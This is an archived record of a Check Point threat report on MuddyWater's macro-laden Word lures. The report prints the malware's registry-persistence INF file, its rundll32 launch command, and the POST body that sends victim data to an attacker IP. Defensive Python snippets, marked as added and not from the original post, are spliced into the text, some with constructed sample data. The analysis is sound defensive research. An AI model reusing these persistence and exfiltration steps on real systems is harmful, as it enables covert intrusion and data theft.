{
	"id": "b9a81e98-a347-4b8c-9ee3-46927ff0d705",
	"created_at": "2026-04-10T03:22:10.66884Z",
	"updated_at": "2026-04-10T13:12:32.21005Z",
	"deleted_at": null,
	"sha1_hash": "534e66a543375db923604eb4a4e7ee07d168985b",
	"title": "The Muddy Waters of APT Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 80765,
	"plain_text": "The Muddy Waters of APT Attacks\r\nBy deugenio\r\nPublished: 2019-04-10 · Archived: 2026-04-10 02:27:28 UTC\r\nThe Iranian APT, MuddyWater, has been active since at least 2017. Most recently though, a new campaign, targeting\r\nBelarus, Turkey and Ukraine, has emerged that caught the attention of Check Point researchers.\r\nEver since at least 2017, the attackers behind MuddyWater have used a simple yet effective infection vector: Spear-phishing.\r\nAttacks usually begin with a targeted email sent to an organization. The next step is to steal legitimate documents from the\r\ncompromised systems within that organization and then weaponize and distribute them to other unsuspecting victims.\r\nTo do this, a lure message that prompts the user to enable their content is added to those files, which are often carrying logos\r\nof real companies or governmental entities. The well-crafted and socially engineered malicious documents then become the\r\nfirst stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS, a signature PowerShell\r\nbackdoor of this threat group. This powerful backdoor can receive commands from the attackers, enabling it to exfiltrate\r\nfiles from the system it is running on, execute additional scripts, delete files, and more.\r\nWhile these methods have remained consistent over the years, intermediate stages of this attack have been added, changed\r\nand removed due to several security vendors now aware of MuddyWater’s tactics, techniques and procedures. In this latest\r\nattack, though, and for the first time, we see a second stage executable that is not written in PowerShell.\r\nThe New Sample\r\nWe initially came across a malicious Word document titled “SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc”, which\r\nroughly translates into “SPK (Capital Markets Board of Turkey) Law Change.doc”. 
The document contains macros and tries\r\nto convince the victim to enable its content by displaying a decoy message in Turkish:\r\nFig 1: Malicious document with macros\r\nSHA-256: 2f77ec3dd5a5c8146213fdf6ac2df4a25a542cbd809689a5642954f2097e037a\r\nThe blurred image in the background contains a seemingly legitimate description of the law changes mentioned in\r\nthe title. The highlighted words in this image might suggest that it was edited in an environment that does not support the\r\nTurkish language:\r\nFig 2: Decoy document created in non-Turkish environment\r\nhttps://research.checkpoint.com/the-muddy-waters-of-apt-attacks/\r\nPage 1 of 10\n\nThe Infection Flow\r\nIf the macros in “SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled, an embedded payload is decoded and\r\nsaved in the %APPDATA% directory with the name “CiscoAny.exe”.\r\nThe executable is written in Delphi and packed with UPX, contains anti-analysis techniques, and seems to impersonate\r\na cellular networking tool:\r\nCopyright             Copyright 2015-2019 A\u0026C Inc.\r\nProduct               RT 4G Cellular Networking Tool\r\nDescription           RT 4G Cellular Networking\r\nOriginal Name         RT_Framework.exe\r\nInternal Name         RT_4G\r\nFile Version          1.5.1.1\r\nComments              This application is absloutly free.\r\nRather than running this executable immediately, another file called “CiscoTAP.inf” is created in the same directory\r\nwith the following content:\r\n[Version]\r\nSignature=$CHICAGO$\r\n[DefaultInstall]\r\nAddReg=AddRegSection\r\n[AddRegSection]\r\nHKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Run,CiscoAny,,\"%APPDATA%\\CiscoAny.exe\"\r\nThen, the following command is executed to run the payload:\r\n\"C:\\Windows\\System32\\cmd.exe\" /k rundll32.exe ieadvpack.dll,LaunchINFSection %APPDATA%\\CiscoTAP.inf,,1,\r\nThis means that the executable will run the 
next time the user logs in, since it is added to the Run registry key. IEAdvpack\r\nis a Windows 8 DLL, and this command will fail on operating system versions where this DLL is not found.\r\nINF files have been used in the past by MuddyWater, although they were launched using Advpack.dll rather than\r\nIEAdvpack.dll.\r\nOnce executed, the first stage creates %APPDATA%\\ID.dat, a file containing the victim’s randomly generated, 16-character\r\nunique identifier:\r\n[UID]\r\nID=[VICTIM_ID]\r\nIt then collects information about the system it is running on, such as the host name, the running processes, physical\r\nmemory, uptime, language, public IP (using icanhazip.com) and more.\r\nAll of the above is written to %APPDATA%\\Info.txt; the full information structure can be found in Appendix A below.\r\nFollowing the data collection, the executable drops another executable, also named “CiscoAny.exe”, that is embedded as a\r\nresource, but this time inside the %TEMP% folder.\r\nThe second executable is also UPX packed and written in Delphi:\r\nProduct               Uploader\r\nDescription           Uploader\r\nOriginal Name         CiscoAny.exe\r\nProgramId             com.embarcadero.Uploader\r\nFile Version          1.0.0.0\r\nFinally, the aforementioned ID.dat file is updated to indicate that the first stage of the infection has succeeded:\r\n[UID]\r\nID=[VICTIM_ID]\r\n[STAGE]\r\nONE=SUC\r\nThe Second Stage\r\nThe second executable starts by checking internet connectivity. 
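Before following the second stage further, here is an added example of how a hunter would handle the first-stage artifacts described above. It is not code from the Check Point post or from the malware: it parses the AddReg section of a CiscoTAP.inf-style file to recover the Run-key entry the INF creates, and flags process-creation command lines in which rundll32.exe launches an INF section through advpack.dll or ieadvpack.dll (the DLL name is captured so the switch between the two is visible). The INF content is the one reproduced in the post; the process events and the INF_FILES mapping are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# CiscoTAP.inf as reproduced in the post (quotes straightened).
CISCOTAP_INF = '''[Version]
Signature=$CHICAGO$
[DefaultInstall]
AddReg=AddRegSection
[AddRegSection]
HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Run,CiscoAny,,\"%APPDATA%\\CiscoAny.exe\"
'''

# Constructed stand-in for INF files retrieved from the host, keyed by the path seen on the command line.
INF_FILES = {'%APPDATA%\\CiscoTAP.inf': CISCOTAP_INF}

# Constructed process-creation events (not real telemetry). Only the first two should fire.
SAMPLE_EVENTS = [
    {'pid': 4120, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': '\"C:\\Windows\\System32\\cmd.exe\" /k rundll32.exe ieadvpack.dll,LaunchINFSection %APPDATA%\\CiscoTAP.inf,,1,'},
    {'pid': 4188, 'image': 'C:\\Windows\\System32\\rundll32.exe',
     'cmdline': 'rundll32.exe advpack.dll,LaunchINFSection C:\\Windows\\Temp\\setup.inf,DefaultInstall'},
    {'pid': 5002, 'image': 'C:\\Windows\\System32\\rundll32.exe',
     'cmdline': 'rundll32.exe shell32.dll,Control_RunDLL desk.cpl'},
    {'pid': 5100, 'image': 'C:\\Windows\\System32\\cmd.exe', 'cmdline': 'cmd.exe /c dir'},
]

# rundll32 loading advpack.dll or ieadvpack.dll and calling LaunchINFSection. The DLL name is
# captured so the advpack/ieadvpack variation the post mentions shows up in the report.
LAUNCH_INF = re.compile(
    'rundll32(?:[.]exe)?[ ]+((?:ie)?advpack[.]dll)[ ]*,[ ]*launchinfsection', re.IGNORECASE)
# First argument after LaunchINFSection: the INF path (optionally quoted; paths with spaces not handled).
INF_ARG = re.compile('[ ]+\"?([^, \"]+[.]inf)', re.IGNORECASE)


def parse_inf(text: str) -> Dict[str, List[str]]:
    '''Split an INF into {section_name (lowercased): [lines]}; blanks and ; comments are dropped.'''
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def persistence_entries(text: str) -> List[Tuple[str, str, str, str]]:
    '''Follow DefaultInstall -> AddReg=<sections> and return (root, subkey, value_name, data)
    for each registry line. INF registry lines are root,subkey,value-name,flags,data; flags may be empty.'''
    sections = parse_inf(text)
    targets: List[str] = []
    for line in sections.get('defaultinstall', []):
        key, _, value = line.partition('=')
        if key.strip().lower() == 'addreg':
            targets.extend(s.strip().lower() for s in value.split(','))
    entries = []
    for name in targets:
        for line in sections.get(name, []):
            parts = [p.strip() for p in line.split(',', 4)]
            if len(parts) < 5:
                continue
            root, subkey, value_name, _flags, data = parts
            entries.append((root, subkey, value_name, data.strip('\"\u201c\u201d')))
    return entries


def find_inf_launches(events: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    '''Return (pid, dll, inf_path) for every event whose command line runs an INF section via rundll32.'''
    hits = []
    for ev in events:
        cmd = str(ev['cmdline'])
        m = LAUNCH_INF.search(cmd)
        if not m:
            continue
        arg = INF_ARG.search(cmd[m.end():])
        hits.append((int(ev['pid']), m.group(1).lower(), arg.group(1) if arg else ''))
    return hits


def triage(events: List[Dict[str, object]], inf_files: Dict[str, str]) -> List[Dict[str, object]]:
    '''Join each detection with the Run-key entries its INF would create, when the INF is available.'''
    report = []
    for pid, dll, inf in find_inf_launches(events):
        entries = persistence_entries(inf_files[inf]) if inf in inf_files else []
        report.append({'pid': pid, 'dll': dll, 'inf': inf,
                       'run_keys': ['\\'.join((r, k, v)) + ' = ' + d for r, k, v, d in entries]})
    return report


if __name__ == '__main__':
    for row in triage(SAMPLE_EVENTS, INF_FILES):
        print(row)
```

The detection keys on the DLL plus export rather than on the INF file name, since CiscoTAP.inf is specific to this sample while LaunchINFSection via advpack.dll or ieadvpack.dll is the reusable technique; the parser is what turns a recovered INF into the concrete persistence entry to check on the host.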
It sends a request to google.com, and if the connection is\r\nsuccessful, it copies the contents of the previously created “Info.txt” into %APPDATA%\\[UNIQUE_ID].txt\r\nFig 3: Second stage instructions\r\nThen, it POSTs the file containing the system details to 185.117.75[.]116.php:\r\n—————————–[VICTIM_ID]\r\nContent-Disposition: form-data; name=\"g3t_f_465\"; filename=\"[UNIQUE_ID].txt\"\r\nContent-Type: application/octet-stream\r\n[INFO.TXT CONTENT]\r\n—————————–[VICTIM_ID]\r\nContent-Disposition: form-data; name=\"t0ken\"\r\na8s9ydehj323r8ykjqwer@8124e\r\n—————————–[VICTIM_ID]–\r\nThe name parameters (“g3t_f_465” and “t0ken”) in this request are determined by the items of the TclHttpRequest object\r\nin the TFRMMAIN resource embedded in the executable:\r\nFig 3: Embedded configuration\r\nReturning to the main executable, a request is sent to googleads.hopto[.]org with the victim’s unique ID:\r\nFig 6: C\u0026C communication\r\nThe response from the C\u0026C is stored in %APPDATA%\\temp.dat and copied into %APPDATA%\\Lib.ps1.\r\nThe main executable constantly checks for “Lib.ps1” and tries to execute its content.\r\nAt the time of the analysis we were unable to get a response from the C\u0026C but, as previously mentioned, POWERSTATS is\r\na common tool for the next stage of the infection.\r\nAnti-Analysis\r\nThe anti-analysis technique used in the first executable is quite effective and makes the sample very hard to analyze\r\nstatically.\r\nThe obfuscation produces spaghetti-like code: the original control flow is broken into small chunks, and the address of\r\nthe next “real” instruction is computed at run time.\r\nFollowing are examples of such code, where the next instruction location is calculated and then jumped to (either by “jmp”\r\nor 
“retn”):\r\nFig 7: Anti-analysis code fragmentation\r\nSimilarities to MuddyWater\r\nThe document and its embedded macros contain unique strings that we used to hunt for similar samples. This turned up\r\nthree recent documents that appear to belong to the same campaign, some of which other researchers have attributed to\r\nMuddyWater:\r\nName: 2-Merve_Cooperation_CV.doc\r\nFirst Seen: Jan 02, 2019\r\nITW: infosystema[.]kg/public/images/file_library/2-Merve_Cooperation_CV.doc\r\nSHA-256: c873532e009f2fc7d3b111636f3bbaa307465e5a99a7f4386bebff2ef8a37a20\r\nName: 3-New Law Updated for Client-VMP.doc\r\nFirst Seen: Jan 08, 2019\r\nITW: As an attachment in two e-mails\r\nSHA-256: 925225002364615b964e4e3704876d9b101e4f07169dbb459175248aefb5a0ad\r\nName: letter-for-Kazakhstan.doc\r\nFirst Seen: Jan 16, 2019\r\nITW: orbe-fzc[.]com/letter-for-Kazakhstan.doc\r\nSHA-256: c005e11a037210eb8efe12b8dee794be36151de30b0223f2c9c4b9680cb033c0\r\nIn addition, by using VBA2Graph we were able to visualize the VBA call graph of the macros in each document. This\r\nallowed us to quickly notice that the files share many similarities, such as their function names, parameter names, decryption\r\nmethods and general code flow. 
One example is the function “UFYYRJSFHX”, which writes the decoded payload to the file\r\nsystem and appears in all of them.\r\nWe have color coded the functions below, highlighting analogous functions to better show the similarities between the\r\ndifferent graphs in this campaign, starting with the document from the infection flow we analyzed above:\r\nFig 8: Vba2graph correlation within the same campaign\r\nAll those documents are from 2019, but the last two contain unique function names (“F38HUYFLSF985HFUISHS” and\r\n“SSSDS98746GB”) that were also observed in MuddyWater documents dating back to November 2018, allowing us to see\r\na connection between different campaigns:\r\nFig 9: Vba2graph correlation to a different campaign\r\nMuddyWater Anomalies\r\nWhile we can see a clear connection between the previous samples, there are some differences between them and the\r\ncommon delivery documents usually attributed to this highly active threat group.\r\nFor example, if we consider their appearance, and although this is not always the case, MuddyWater documents usually\r\ninclude a generic decoy message in English telling the victim to enable content. 
This is missing from two of the\r\nprevious samples, and written in Turkish in the third one.\r\nFurthermore, if we continue to compare the macros of different documents, we notice that a sample we discovered this\r\nmonth and attributed to MuddyWater uses a different function naming convention in its macros (four lowercase letters, instead\r\nof a mix of uppercase letters and numerals):\r\nFig 10: Vba2graph of a parallel recent campaign\r\nSHA-256: 08e256cd2fa027552be253ec3bf427b537977f9123adf1f36e7cd2843a057554\r\nThis deviates completely from the previous documents we looked into, but was also found in other MuddyWater samples\r\nfrom recent months:\r\nFig 11: Vba2graph of a parallel recent campaign\r\nSHA-256: 93b749082651d7fc0b3caa9df81bad7617b3bd4475de58acfe953dfafc7b3987\r\nIt therefore seems that the same attackers are running parallel campaigns, which use at least two different macro generators\r\nfor the first stage of the attack.\r\nConclusion\r\nAlthough it has focused most of its efforts on the Middle East region, the political affiliations, motives and purposes behind\r\nMuddyWater’s attacks are not well defined, thus earning it its name. In the past, countries such as Saudi Arabia, the\r\nUAE and Turkey have been the main targets, but the campaigns have also reached a much wider audience, making their way to\r\nvictims in countries such as Belarus and Ukraine.\r\nThe attackers are also constantly innovating and experimenting with new techniques, and the extra layers they add\r\nbefore delivering their signature payload make it harder to attribute an attack to them with high confidence. 
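Returning to the macro function names discussed above, the following is an added example (not code from the post, and not VBA2Graph) of the correlation a hunter can script once function names have been pulled from each document's macros: it classifies every name as the uppercase-alphanumeric convention or the four-lowercase-letter convention the post describes, fingerprints which generator likely produced a document, and groups documents into campaigns by name overlap. UFYYRJSFHX, F38HUYFLSF985HFUISHS and SSSDS98746GB are the names quoted in the post; every other name, the composition of each set, the shortened document labels and the similarity threshold are constructed assumptions.

```python
import re
from itertools import combinations
from typing import Dict, List, Set

# Function-name sets per document. The three names from the post are real; everything else
# here, including which names appear together, is constructed for the example.
DOC_FUNCS: Dict[str, Set[str]] = {
    'SPK_KANUN.doc': {'UFYYRJSFHX', 'AutoOpen', 'QWE45RTYUI', 'ZXC12VBNM', 'Document_Open'},
    '2-Merve_CV.doc': {'UFYYRJSFHX', 'AutoOpen', 'QWE45RTYUI', 'PLM09OKN'},
    '3-New_Law.doc': {'UFYYRJSFHX', 'F38HUYFLSF985HFUISHS', 'SSSDS98746GB', 'AutoOpen'},
    'letter-Kazakhstan.doc': {'UFYYRJSFHX', 'F38HUYFLSF985HFUISHS', 'SSSDS98746GB', 'PLM09OKN'},
    'nov2018_sample.doc': {'F38HUYFLSF985HFUISHS', 'SSSDS98746GB', 'AutoOpen', 'HGF67DSA'},
    'parallel_campaign.doc': {'abcd', 'efgh', 'ijkl', 'AutoOpen'},
}

UPPER_ALNUM = re.compile('^[A-Z][A-Z0-9]{5,}$')  # mix of uppercase letters and numerals
FOUR_LOWER = re.compile('^[a-z]{4}$')             # four lowercase letters
# Auto-exec entry points are the same in every document, so they carry no generator signal.
AUTO_EXEC = {'autoopen', 'auto_open', 'autoexec', 'autoclose', 'document_open',
             'document_close', 'workbook_open'}


def convention(name: str) -> str:
    '''Label a VBA function name by naming convention.'''
    if name.lower() in AUTO_EXEC:
        return 'auto-exec'
    if UPPER_ALNUM.match(name):
        return 'upper-alnum'
    if FOUR_LOWER.match(name):
        return 'four-lower'
    return 'other'


def generator_fingerprint(funcs: Set[str]) -> str:
    '''Majority convention among generated (non auto-exec) names: which macro generator likely built the doc.'''
    counts: Dict[str, int] = {}
    for n in funcs:
        c = convention(n)
        if c != 'auto-exec':
            counts[c] = counts.get(c, 0) + 1
    return max(counts, key=counts.get) if counts else 'unknown'


def jaccard(a: Set[str], b: Set[str]) -> float:
    '''Overlap of generated names only; auto-exec names are ignored so they cannot link unrelated docs.'''
    a2 = {n for n in a if convention(n) != 'auto-exec'}
    b2 = {n for n in b if convention(n) != 'auto-exec'}
    union = a2 | b2
    return len(a2 & b2) / len(union) if union else 0.0


def cluster(docs: Dict[str, Set[str]], threshold: float = 0.25) -> List[Set[str]]:
    '''Union-find over pairs whose Jaccard overlap reaches the threshold (assumed value).'''
    names = list(docs)
    parent = {n: n for n in names}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in combinations(names, 2):
        if jaccard(docs[a], docs[b]) >= threshold:
            parent[find(a)] = find(b)
    groups: Dict[str, Set[str]] = {}
    for n in names:
        groups.setdefault(find(n), set()).add(n)
    return sorted(groups.values(), key=lambda g: sorted(g))


def shared_names(docs: Dict[str, Set[str]], min_docs: int = 2) -> Dict[str, List[str]]:
    '''Generated names seen in at least min_docs documents: the pivots worth hunting on.'''
    index: Dict[str, List[str]] = {}
    for doc, funcs in docs.items():
        for n in funcs:
            if convention(n) != 'auto-exec':
                index.setdefault(n, []).append(doc)
    return {n: sorted(d) for n, d in index.items() if len(d) >= min_docs}


if __name__ == '__main__':
    for doc, funcs in DOC_FUNCS.items():
        print(doc, generator_fingerprint(funcs))
    print(cluster(DOC_FUNCS))
    print(shared_names(DOC_FUNCS))
```

With these constructed sets the four 2019 documents and the November 2018 sample fall into one cluster through the shared generated names, while the four-lowercase-letter document stands alone, which is the two-generator picture the post describes; on real extractions the threshold needs tuning, and names that are unique to one document are the ones a hunter pivots on next.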
Just recently, we\r\nspotted two DOCX files that take advantage of the external template technique to download the macro-equipped and\r\nfamiliar delivery documents of MuddyWater from remote hosts.\r\nTo conclude, the attack we describe above shows an infection flow that we do not usually expect to see from\r\nMuddyWater, but it will not be surprising to see them introduce more changes in the near future.\r\nCheck Point’s Threat Emulation\r\nThe malware used in this attack was caught using Check Point’s Threat Emulation.\r\nThreat Emulation is an innovative zero-day threat sandboxing capability, used by SandBlast Network to deliver the best\r\npossible catch rate for threats, and is virtually immune to attackers’ evasion techniques. As part of the Check Point\r\nSandBlast Zero-Day Protection solution, Threat Emulation prevents infections from new malware and targeted attacks.\r\nAppendix A\r\nIP Address : [IP_ADDRESS]\r\nHDD Information :\r\nH.D.D Name : [HOST_NAME]\r\nProcess List :\r\n0 = [PROCESS_NAME_0]\r\n1 = [PROCESS_NAME_1]\r\n2 = [PROCESS_NAME_2]\r\n3 = [PROCESS_NAME_3]\r\n4 = [PROCESS_NAME_4]\r\n5 = [PROCESS_NAME_5]\r\n6 = [PROCESS_NAME_6]\r\n7 = [PROCESS_NAME_7]\r\n8 = [PROCESS_NAME_8]\r\n9 = [PROCESS_NAME_9]\r\n10 = [PROCESS_NAME_10]\r\nMemory information :\r\n[%] memory in use\r\n[KB] of physical memory\r\n[KB] of available physical memory\r\n[KB] that can be stored in the paging file\r\n[KB] available in the paging file\r\nLanguage Is :English (United States)\r\nUptime: 1 Days 1 Hours 1 Minutes 1 Second\r\nSource: https://research.checkpoint.com/the-muddy-waters-of-apt-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/the-muddy-waters-of-apt-attacks/"
	],
	"report_names": [
		"the-muddy-waters-of-apt-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775791330,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/534e66a543375db923604eb4a4e7ee07d168985b.pdf",
		"text": "https://archive.orkl.eu/534e66a543375db923604eb4a4e7ee07d168985b.txt",
		"img": "https://archive.orkl.eu/534e66a543375db923604eb4a4e7ee07d168985b.jpg"
	}
}